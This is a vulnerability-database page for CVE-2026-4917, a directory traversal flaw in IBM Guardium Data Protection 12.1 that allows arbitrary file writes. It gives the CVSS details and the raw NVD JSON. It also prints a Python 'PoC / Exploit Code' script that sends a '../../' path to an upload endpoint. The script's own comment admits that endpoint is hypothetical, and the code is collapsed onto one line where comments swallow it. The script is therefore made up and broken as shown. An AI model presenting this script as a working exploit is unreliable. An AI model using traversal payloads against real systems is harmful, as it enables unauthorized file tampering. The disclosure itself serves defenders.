Security Vulnerability Report
中文
CVE-2026-4917 CVSS 4.9 MEDIUM

CVE-2026-4917

Published: 2026-04-23 00:16:46
Last Modified: 2026-04-27 18:13:47

Description

IBM Guardium Data Protection 12.1 could allow an administrative user to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to write arbitrary files on the system.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:guardium_data_protection:12.1:*:*:*:*:*:*:* - VULNERABLE
IBM Guardium Data Protection 12.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-4917: IBM Guardium Data Protection Arbitrary File Write # This script demonstrates the directory traversal vulnerability. # Note: Admin privileges are required (PR:H). import requests def exploit(target_ip, admin_user, admin_pass): # The vulnerable endpoint (hypothetical based on description) url = f"https://{target_ip}/api/upload_file" # The payload containing directory traversal sequences # Attempting to write to a sensitive system location traversal_payload = "../../tmp/malicious_payload.txt" data = { "file": traversal_payload, "content": "This is an arbitrary file write exploit." } try: response = requests.post(url, data=data, auth=(admin_user, admin_pass), verify=False) if response.status_code == 200: print("[+] Exploit successful! File written.") else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}") # Usage # exploit("<TARGET_IP>", "admin", "password")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4917", "sourceIdentifier": "[email protected]", "published": "2026-04-23T00:16:46.293", "lastModified": "2026-04-27T18:13:46.847", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Guardium Data Protection 12.1 could allow an administrative user to traverse directories on the system. An attacker could send a specially crafted URL request containing \"dot dot\" sequences (/../) to write arbitrary files on the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:guardium_data_protection:12.1:*:*:*:*:*:*:*", "matchCriteriaId": "EADF2641-F8DF-4986-8106-287C615DE19D"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7270422", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}